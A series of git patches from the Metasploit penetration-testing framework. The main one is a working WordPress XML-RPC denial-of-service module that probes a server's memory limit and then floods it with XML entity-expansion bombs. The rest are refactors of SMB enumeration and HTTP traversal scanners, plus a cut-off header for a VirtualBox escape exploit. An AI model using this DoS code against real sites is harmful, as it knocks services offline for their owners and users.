+      OptInt.new('RLIMIT', [ true, "Number of requests to send", 1000 ])
+    ], self.class)
+  end
+
+  def generate_xml_bomb
+    entity = Rex::Text.rand_text_alpha(3)
+
+    # Wordpress only resolves one level of entities so we need
+    # to specify one long entity and reference it multiple times
+    xml = '<?xml version="1.0" encoding="iso-8859-1"?>'
+    xml << "<!DOCTYPE #{Rex::Text.rand_text_alpha(6)} ["
+    xml << "<!ENTITY #{entity} \"#{Rex::Text.rand_text_alpha(9000)}\">"
+    xml << ']>'
+    xml << '<methodCall>'
+    xml << '<methodName>'
+    xml << "&#{entity};" * 2000
+    xml << '</methodName>'
+    xml << '<params>'
+    xml << "<param><value>#{Rex::Text.rand_text_alpha(5)}</value></param>"
+    xml << "<param><value>#{Rex::Text.rand_text_alpha(5)}</value></param>"
+    xml << '</params>'
+    xml << '</methodCall>'
+
+    xml
+  end
+
+  def run
+    for x in 1..datastore['RLIMIT']
+      print_status("#{peer} - Sending request ##{x}...")
+      opts = {
+        'method'  => 'POST',
+        'uri'     => wordpress_url_xmlrpc,
+        'data'    => generate_xml_bomb,
+        'ctype'   =>'text/xml'
+      }
+      begin
+        c = connect
+        r = c.request_cgi(opts)
+        c.send_request(r)
+        # Don't wait for a response, can take very long
+      rescue ::Rex::ConnectionError => exception
+        print_error("#{peer} - Unable to connect: '#{exception.message}'")
+        return
+      ensure
+        disconnect(c) if c
+      end
+    end
+  end
+end

From 4af0eca3306dbfd43a8e28ef7dafb4c867a1f451 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 7 Aug 2014 09:11:01 -0500
Subject: [PATCH 248/321] Update target description

---
 modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
index 41d788b2dd..0b16400b5d 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'	=> 'win',
       'Targets'	=>
         [
-          [ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English/Spanish)', { 'Ret' => '' } ]
+          [ 'Adobe Reader v8.x, v9.x / Windows [XP SP3/Vista/7] (English/Spanish)', { 'Ret' => '' } ]
         ],
       'DefaultTarget'	=> 0))
 

From b259e5b4642c5782bee1fcb50e0bc6fe41c8eec8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 7 Aug 2014 09:21:25 -0500
Subject: [PATCH 249/321] Update description again

---
 modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
index 0b16400b5d..f0ccd33838 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'	=> 'win',
       'Targets'	=>
         [
-          [ 'Adobe Reader v8.x, v9.x / Windows [XP SP3/Vista/7] (English/Spanish)', { 'Ret' => '' } ]
+          [ 'Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)', { 'Ret' => '' } ]
         ],
       'DefaultTarget'	=> 0))
 

From e432f3f44289cefe1588da94879b7706cf028f1b Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 11:10:32 -0500
Subject: [PATCH 250/321] Support all text-based ctypes

---
 lib/msf/core/auxiliary/report.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index 53e18d9fe2..76ba80dd62 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -215,7 +215,7 @@ module Auxiliary::Report
     end
 
     case ctype
-    when "text/plain"
+    when /^text\/[\w\.]+$/
       ext = "txt"
     end
     # This method is available even if there is no database, don't bother checking

From a7be5b5164de6e304879d60eea0a1bab2d1c965e Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Thu, 7 Aug 2014 18:12:58 +0200
Subject: [PATCH 251/321] Added fingerprinting

---
 .../dos/http/wordpress_xmlrpc_dos.rb          | 113 ++++++++++++++++--
 1 file changed, 102 insertions(+), 11 deletions(-)

diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb
index b6d33d3603..e2b3d9c4bc 100644
--- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb
@@ -38,37 +38,128 @@ class Metasploit3 < Msf::Auxiliary
     [
       OptInt.new('RLIMIT', [ true, "Number of requests to send", 1000 ])
     ], self.class)
+
+    register_advanced_options(
+    [
+      OptInt.new('FINGERPRINT_STEP', [true, "The stepsize in MB when fingerprinting", 8]),
+      OptInt.new('DEFAULT_LIMIT', [true, "The default limit in MB", 8])
+    ], self.class)
   end
 
-  def generate_xml_bomb
+  def rlimit
+    datastore['RLIMIT']
+  end
+
+  def default_limit
+    datastore['DEFAULT_LIMIT']
+  end
+
+  def fingerprint_step
+    datastore['FINGERPRINT_STEP']
+  end
+
+  def fingerprint
+    memory_to_use = fingerprint_step
+    # try out the available memory in steps
+    # apache will return a server error if the limit is reached
+    while memory_to_use < 1024
+      vprint_status("#{peer} - trying memory limit #{memory_to_use}MB")
+      opts = {
+        'method'  => 'POST',
+        'uri'     => wordpress_url_xmlrpc,
+        'data'    => generate_xml(memory_to_use),
+        'ctype'   =>'text/xml'
+      }
+
+      begin
+        # low timeout because the server error is returned immediately
+        res = send_request_cgi(opts, timeout = 3)
+      rescue ::Rex::ConnectionError => exception
+        print_error("#{peer} - unable to connect: '#{exception.message}'")
+        break
+      end
+
+      if res && res.code == 500
+        # limit reached, return last limit
+        last_limit = memory_to_use - fingerprint_step
+        vprint_status("#{peer} - got an error - using limit #{last_limit}MB")
+        return last_limit
+      else
+        memory_to_use += fingerprint_step
+      end
+    end
+
+    # no limit can be determined
+    print_warning("#{peer} - can not determine limit, will use default of #{default_limit}")
+    return default_limit
+  end
+
+  def generate_xml(size)
     entity = Rex::Text.rand_text_alpha(3)
+    doctype = Rex::Text.rand_text_alpha(6)
+    param_value_1 = Rex::Text.rand_text_alpha(5)
+    param_value_2 = Rex::Text.rand_text_alpha(5)
+
+    size_bytes = size * 1024
 
     # Wordpress only resolves one level of entities so we need
     # to specify one long entity and reference it multiple times
     xml = '<?xml version="1.0" encoding="iso-8859-1"?>'
-    xml << "<!DOCTYPE #{Rex::Text.rand_text_alpha(6)} ["
-    xml << "<!ENTITY #{entity} \"#{Rex::Text.rand_text_alpha(9000)}\">"
+    xml << "<!DOCTYPE %{doctype} ["
+    xml << "<!ENTITY %{entity} \"%{entity_value}\">"
     xml << ']>'
     xml << '<methodCall>'
     xml << '<methodName>'
-    xml << "&#{entity};" * 2000
+    xml << "%{payload}"
     xml << '</methodName>'
     xml << '<params>'
-    xml << "<param><value>#{Rex::Text.rand_text_alpha(5)}</value></param>"
-    xml << "<param><value>#{Rex::Text.rand_text_alpha(5)}</value></param>"
+    xml << "<param><value>%{param_value_1}</value></param>"
+    xml << "<param><value>%{param_value_2}</value></param>"
     xml << '</params>'
     xml << '</methodCall>'
 
-    xml
+    empty_xml = xml % {
+      :doctype => '',
+      :entity => '',
+      :entity_value => '',
+      :payload => '',
+      :param_value_1 => '',
+      :param_value_2 => ''
+    }
+
+    space_to_fill = size_bytes - empty_xml.size
+    vprint_debug("#{peer} - max XML space to fill: #{space_to_fill} bytes")
+
+    payload = "&#{entity};" * (space_to_fill / 6)
+    entity_value_length = space_to_fill - payload.length
+
+    payload_xml = xml % {
+      :doctype => doctype,
+      :entity => entity,
+      :entity_value => Rex::Text.rand_text_alpha(entity_value_length),
+      :payload => payload,
+      :param_value_1 => param_value_1,
+      :param_value_2 => param_value_2
+    }
+
+    payload_xml
   end
 
   def run
-    for x in 1..datastore['RLIMIT']
-      print_status("#{peer} - Sending request ##{x}...")
+    # get the max size
+    print_status("#{peer} - trying to fingerprint the maximum memory we could use")
+    size = fingerprint
+    print_status("#{peer} - using #{size}MB as memory limit")
+
+    # only generate once
+    xml = generate_xml(size)
+
+    for x in 1..rlimit
+      print_status("#{peer} - sending request ##{x}...")
       opts = {
         'method'  => 'POST',
         'uri'     => wordpress_url_xmlrpc,
-        'data'    => generate_xml_bomb,
+        'data'    => xml,
         'ctype'   =>'text/xml'
       }
       begin
@@ -77,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
         c.send_request(r)
         # Don't wait for a response, can take very long
       rescue ::Rex::ConnectionError => exception
-        print_error("#{peer} - Unable to connect: '#{exception.message}'")
+        print_error("#{peer} - unable to connect: '#{exception.message}'")
         return
       ensure
         disconnect(c) if c

From c7090f57a56c37fde9c2a956e6000f864264a1f9 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 11:25:55 -0500
Subject: [PATCH 252/321] Fix "text" ctype in smb_enumshares

"text" is not a valid ctype, should be text/plain
---
 modules/auxiliary/scanner/smb/smb_enumshares.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index 2a268bcd0b..78a9002847 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -415,10 +415,10 @@ class Metasploit3 < Msf::Auxiliary
         p = store_loot('smb.enumshares', 'text/csv', ip, detailed_tbl.to_csv)
         print_good("#{ip} - info saved in: #{p.to_s}")
       elsif datastore['LogSpider'] == '2'
-        p = store_loot('smb.enumshares', 'text', ip, detailed_tbl)
+        p = store_loot('smb.enumshares', 'text/plain', ip, detailed_tbl)
         print_good("#{ip} - info saved in: #{p.to_s}")
       elsif datastore['LogSpider'] == '3'
-        p = store_loot('smb.enumshares', 'text', ip, logdata)
+        p = store_loot('smb.enumshares', 'text/plain', ip, logdata)
         print_good("#{ip} - info saved in: #{p.to_s}")
       end
     end

From 711630d059f9f7f716a5f4ad875b2635776a3817 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 13:28:51 -0500
Subject: [PATCH 253/321] Fix datastore assignments

---
 .../auxiliary/scanner/http/http_traversal.rb  | 46 +++++++++++--------
 1 file changed, 27 insertions(+), 19 deletions(-)

diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index a24ba1412e..3e54525e78 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -80,6 +80,18 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('RHOST')
   end
 
+
+  # Avoids writing to datastore['METHOD'] directly
+  def method
+    @method || datastore['METHOD']
+  end
+
+  # Avoids writing to datastore['DATA'] directly
+  def data
+    @data || datastore['DATA']
+  end
+
+
   #
   # The fuzz() function serves as the engine for the module.  It can intelligently mutate
   # a trigger, and find potential bugs with it.
@@ -101,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
 
     # Each possible trigger, we try to traverse multiple levels down depending
     # on datastore['DEPATH']
-    depth  = datastore['DEPTH']
+    depth = datastore['DEPTH']
     triggers.each do |base|
       1.upto(depth) do |d|
         file_to_read.each do |f|
@@ -124,10 +136,6 @@ class Metasploit3 < Msf::Auxiliary
   def ini_request(uri)
     req = {}
 
-    # If the user is using some rare-to-use method, we probably have not fully tested,
-    # so we will not support it for now.
-    method = datastore['METHOD']
-    data   = datastore['DATA']
     case method
     when 'GET'
       # Example: Say we have the following datastore['PATH']
@@ -154,10 +162,10 @@ class Metasploit3 < Msf::Auxiliary
       this_path = uri
     end
 
-    req['method']     = datastore['METHOD']
+    req['method']     = method
     req['uri']        = this_path
     req['headers']    = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty?
-    req['data']       = datastore['DATA'] if not datastore['DATA'].empty?
+    req['data']       = data if not data.empty?
     req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
 
     return req
@@ -217,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary
         :proof    => trigger,
         :name     => self.fullname,
         :category => "web",
-        :method   => datastore['METHOD']
+        :method   => method
       })
 
     else
@@ -281,15 +289,15 @@ class Metasploit3 < Msf::Auxiliary
   #
   def is_writable(trigger)
     # Modify some registered options for the PUT method
-    tmp_method = datastore['METHOD']
-    tmp_data   = datastore['DATA']
-    datastore['METHOD'] = 'PUT'
+    tmp_method = method
+    tmp_data   = data
+    @method = 'PUT'
 
-    if datastore['DATA'].empty?
+    if data.empty?
       unique_str = Rex::Text.rand_text_alpha(4) * 4
-      datastore['DATA']   = unique_str
+      @data = unique_str
     else
-      unique_str = datastore['DATA']
+      unique_str = data
     end
 
     # Form the PUT request
@@ -302,8 +310,8 @@ class Metasploit3 < Msf::Auxiliary
     send_request_cgi(req, 25)
 
     # Prepare request to read our file
-    datastore['METHOD'] = 'GET'
-    datastore['DATA']   = tmp_data
+    @method = 'GET'
+    @data   = tmp_data
     req = ini_request(uri)
     vprint_status("Verifying upload...")
     res = send_request_cgi(req, 25)
@@ -316,7 +324,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     # Ah, don't forget to restore our method
-    datastore['METHOD'] = tmp_method
+    @method = tmp_method
   end
 
   #
@@ -332,8 +340,8 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     # Warn if it's not a well-formed UPPERCASE method
-    if datastore['METHOD'] !~ /^[A-Z]+$/
-      print_warning("HTTP method #{datastore['METHOD']} is not Apache-compliant. Try only UPPERCASE letters.")
+    if method !~ /^[A-Z]+$/
+      print_warning("HTTP method #{method} is not Apache-compliant. Try only UPPERCASE letters.")
     end
     print_status("Running action: #{action.name}...")
 

From f7bda738cf9ac36d2d213a7bb5988d5e92deca5a Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 13:30:34 -0500
Subject: [PATCH 254/321] Fix file handle leak

---
 modules/auxiliary/scanner/http/http_traversal.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index 3e54525e78..a9271123cc 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -332,10 +332,7 @@ class Metasploit3 < Msf::Auxiliary
   # This is used in the lfi_download() function
   #
   def load_filelist
-    f = File.open(datastore['FILELIST'], 'rb')
-    buf = f.read
-    f.close
-    return buf
+    File.open(datastore['FILELIST'], 'rb') {|f| buf = f.read}
   end
 
   def run_host(ip)

From c79fe731c5bb7a4a6011ef2a10a5605c088207d7 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 13:32:48 -0500
Subject: [PATCH 255/321] Um, this is the right way to do it.

---
 modules/auxiliary/scanner/http/http_traversal.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index a9271123cc..fb8bf79e3a 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -332,7 +332,7 @@ class Metasploit3 < Msf::Auxiliary
   # This is used in the lfi_download() function
   #
   def load_filelist
-    File.open(datastore['FILELIST'], 'rb') {|f| buf = f.read}
+    File.open(datastore['FILELIST'], 'rb') {|f| f.read}
   end
 
   def run_host(ip)

From 6cea92147861f49d8746f1e317e0ec54b725d48a Mon Sep 17 00:00:00 2001
From: Iquaba <cooka2011@gmail.com>
Date: Thu, 7 Aug 2014 13:44:46 -0500
Subject: [PATCH 256/321] Adds --ask option to prompt before exiting msfconsole

---
 lib/msf/ui/console/command_dispatcher/core.rb | 9 ++++++++-
 lib/msf/ui/console/driver.rb                  | 8 ++++++++
 msfconsole                                    | 4 ++++
 3 files changed, 20 insertions(+), 1 deletion(-)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index c3123ace14..b43f5573d0 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -670,8 +670,15 @@ class Core
     if(framework.sessions.length > 0 and not forced)
       print_status("You have active sessions open, to exit anyway type \"exit -y\"")
       return
+    elsif(driver.confirm_exit and not forced)
+      print("Are you sure you want to exit Metasploit? [y/N]: ")
+      response = gets.downcase.chomp
+      if(response == "y" || response == "yes")
+        driver.stop
+      else
+        return
+      end
     end
-
     driver.stop
   end
 
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index add35b4a77..da814689a4 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -158,6 +158,9 @@ class Driver < Msf::Ui::Driver
     # Whether or not command passthru should be allowed
     self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true
 
+    # Whether or not to confirm before exiting
+    self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false
+
     # Disables "dangerous" functionality of the console
     @defanged = opts['Defanged'] == true
 
@@ -592,6 +595,10 @@ class Driver < Msf::Ui::Driver
   # The framework instance associated with this driver.
   #
   attr_reader   :framework
+  #  
+  # Whether or not to confirm before exiting
+  #  
+  attr_reader   :confirm_exit
   #
   # Whether or not commands can be passed through.
   #
@@ -628,6 +635,7 @@ class Driver < Msf::Ui::Driver
 protected
 
   attr_writer   :framework # :nodoc:
+  attr_writer   :confirm_exit # :nodoc:
   attr_writer   :command_passthru # :nodoc:
 
   #
diff --git a/msfconsole b/msfconsole
index 4934fd86e5..6a446c23bd 100755
--- a/msfconsole
+++ b/msfconsole
@@ -101,6 +101,10 @@ class OptsConsole
         options['DisableBanner'] = true
       end
 
+      opts.on("-a", "--ask", "Ask before exiting Metasploit or accept 'exit -y'") do |v|
+        options['ConfirmExit'] = true
+      end
+      
       opts.on("-x", "-x <command>", "Execute the specified string as console commands (use ; for multiples)") do |s|
         options['XCommands'] ||= []
         options['XCommands'] += s.split(/\s*;\s*/)

From b33d2b8583f41b7c5285e144bd46665aba1e668d Mon Sep 17 00:00:00 2001
From: Iquaba <cooka2011@gmail.com>
Date: Thu, 7 Aug 2014 13:49:13 -0500
Subject: [PATCH 257/321] Adds a newline for readability

---
 lib/msf/ui/console/command_dispatcher/core.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index b43f5573d0..f507f16a28 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -679,6 +679,7 @@ class Core
         return
       end
     end
+
     driver.stop
   end
 

From 6f8c7f092a2c91c51e44f5b73de5ce7233abd1c4 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 17:51:45 -0500
Subject: [PATCH 258/321] Fix direct datastore assignments to pass msftidy

---
 modules/auxiliary/scanner/smb/smb_enumusers.rb | 14 +++++++++++---
 1 file changed, 11 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb
index bef9a6374d..cc8d0e20e0 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb
@@ -33,6 +33,14 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('RPORT', 'RHOST')
   end
 
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def smbdirect
+    @smbdirect || datastore['SMBDirect']
+  end
+
   # Locate an available SMB PIPE for the specified service
   def smb_find_dcerpc_pipe(uuid, vers, pipes)
     found_pipe   = nil
@@ -132,8 +140,8 @@ class Metasploit3 < Msf::Auxiliary
 
     [[139, false], [445, true]].each do |info|
 
-    datastore['RPORT'] = info[0]
-    datastore['SMBDirect'] = info[1]
+    @rport = info[0]
+    @smbdirect = info[1]
 
     sam_pipe   = nil
     sam_handle = nil
@@ -291,7 +299,7 @@ class Metasploit3 < Msf::Auxiliary
         report_note(
           :host => ip,
           :proto => 'tcp',
-          :port => datastore['RPORT'],
+          :port => rport,
           :type => 'smb.domain.enumusers',
           :data => domains[domain]
         )

From ab8f2c7d3f62f07e1711b4e098dc3655e4b051c0 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 17:57:44 -0500
Subject: [PATCH 259/321] Datastore option fix

---
 modules/auxiliary/scanner/smb/smb_lookupsid.rb | 14 +++++++++++---
 1 file changed, 11 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb
index d5798516d5..9d121cf224 100644
--- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb
+++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb
@@ -56,6 +56,14 @@ class Metasploit3 < Msf::Auxiliary
   LSA_VERS     = '0.0'
   LSA_PIPES    = %W{ LSARPC NETLOGON SAMR BROWSER SRVSVC }
 
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def smbdirect
+    @smbdirect || datastore['SMBDirect']
+  end
+
   # Locate an available SMB PIPE for the specified service
   def smb_find_dcerpc_pipe(uuid, vers, pipes)
     found_pipe   = nil
@@ -139,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary
 
     [[139, false], [445, true]].each do |info|
 
-    datastore['RPORT'] = info[0]
-    datastore['SMBDirect'] = info[1]
+    @rport = info[0]
+    @smbdirect = info[1]
 
     lsa_pipe   = nil
     lsa_handle = nil
@@ -271,7 +279,7 @@ class Metasploit3 < Msf::Auxiliary
       report_note(
         :host => ip,
         :proto => 'tcp',
-        :port => datastore['RPORT'],
+        :port => rport,
         :type => 'smb.domain.lookupsid',
         :data => domain
       )

From 1963318e70d1c436d0b39241a53f1fce48a1ef0a Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 17:58:25 -0500
Subject: [PATCH 260/321] Fix datastore options

---
 modules/auxiliary/scanner/smb/smb_version.rb | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb
index 5e44019df1..1ba82e8c34 100644
--- a/modules/auxiliary/scanner/smb/smb_version.rb
+++ b/modules/auxiliary/scanner/smb/smb_version.rb
@@ -36,12 +36,20 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('RPORT')
   end
 
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def smbdirect
+    @smbdirect || datastore['SMBDirect']
+  end
+
   # Fingerprint a single host
   def run_host(ip)
     [[445, true], [139, false]].each do |info|
 
-    datastore['RPORT'] = info[0]
-    datastore['SMBDirect'] = info[1]
+    @rport = info[0]
+    @smbdirect = info[1]
     self.simple = nil
 
     begin

From 436e2abfff165112ab1e2b0045cdc1d67bd6338b Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 17:59:40 -0500
Subject: [PATCH 261/321] Fix datastore options

---
 .../auxiliary/scanner/smb/smb_enumusers_domain.rb    | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
index 7e3f889f3b..4b04c8568e 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
@@ -88,12 +88,20 @@ class Metasploit3 < Msf::Auxiliary
     accounts
   end
 
+  def rport
+    @rport || datastore['RPORT']
+  end
+
+  def smbdirect
+    @smbdirect || datastore['SMBDirect']
+  end
+
   def run_host(ip)
 
     [[139, false], [445, true]].each do |info|
 
-    datastore['RPORT'] = info[0]
-    datastore['SMBDirect'] = info[1]
+    @rport = info[0]
+    @smbdirect = info[1]
 
     begin
       connect()

From 3b27102c4c0d1e38c9698a2f471a2dea2862bbac Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 18:47:33 -0500
Subject: [PATCH 262/321] Override the correct smb_direct

---
 modules/auxiliary/scanner/smb/smb_enumusers_domain.rb | 2 +-
 modules/auxiliary/scanner/smb/smb_lookupsid.rb        | 2 +-
 modules/auxiliary/scanner/smb/smb_version.rb          | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
index 4b04c8568e..b2f107ca4f 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
     @rport || datastore['RPORT']
   end
 
-  def smbdirect
+  def smb_direct
     @smbdirect || datastore['SMBDirect']
   end
 
diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb
index 9d121cf224..96dae994fa 100644
--- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb
+++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
     @rport || datastore['RPORT']
   end
 
-  def smbdirect
+  def smb_direct
     @smbdirect || datastore['SMBDirect']
   end
 
diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb
index 1ba82e8c34..affe6c0b89 100644
--- a/modules/auxiliary/scanner/smb/smb_version.rb
+++ b/modules/auxiliary/scanner/smb/smb_version.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
     @rport || datastore['RPORT']
   end
 
-  def smbdirect
+  def smb_direct
     @smbdirect || datastore['SMBDirect']
   end
 

From 969e5ddd3982b5020f3c4b2f552e5b5f487aaa8a Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Aug 2014 18:48:46 -0500
Subject: [PATCH 263/321] Override the correct smb_direct

---
 modules/auxiliary/scanner/smb/smb_enumusers.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb
index cc8d0e20e0..e43116600e 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
     @rport || datastore['RPORT']
   end
 
-  def smbdirect
+  def smb_direct
     @smbdirect || datastore['SMBDirect']
   end
 

From c35dc4d3ac7a407e4f9677a6e3e9d46d230c24fe Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Fri, 8 Aug 2014 18:07:25 -0700
Subject: [PATCH 264/321] Extract query params separately

Prevents stomping on data
---
 modules/auxiliary/scanner/http/http_traversal.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index fb8bf79e3a..5849689719 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -143,8 +143,8 @@ class Metasploit3 < Msf::Auxiliary
       # We expect it to regex the GET parameters:
       # 'page=1&id=3&note=whatever'
       # And then let queryparse() to handle the rest
-      data = uri.match(/\?(\w+=.+&*)$/)
-      req['vars_get'] = queryparse(data[1]) if not data.nil?
+      query_params = uri.match(/\?(\w+=.+&*)$/)
+      req['vars_get'] = queryparse(query_params[1]) if query_params
     when 'POST'
       req['vars_post'] = queryparse(data) if not data.empty?
     when 'PUT'

From da04b43861ff847c21a67ec890d5ed95386d7889 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 9 Aug 2014 01:56:38 -0500
Subject: [PATCH 265/321] Add module for CVE-2014-0983

---
 .../local/virtual_box_opengl_escape.rb        | 459 ++++++++++++++++++
 1 file changed, 459 insertions(+)
 create mode 100644 modules/exploits/windows/local/virtual_box_opengl_escape.rb

diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
new file mode 100644
index 0000000000..d857396228
--- /dev/null
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
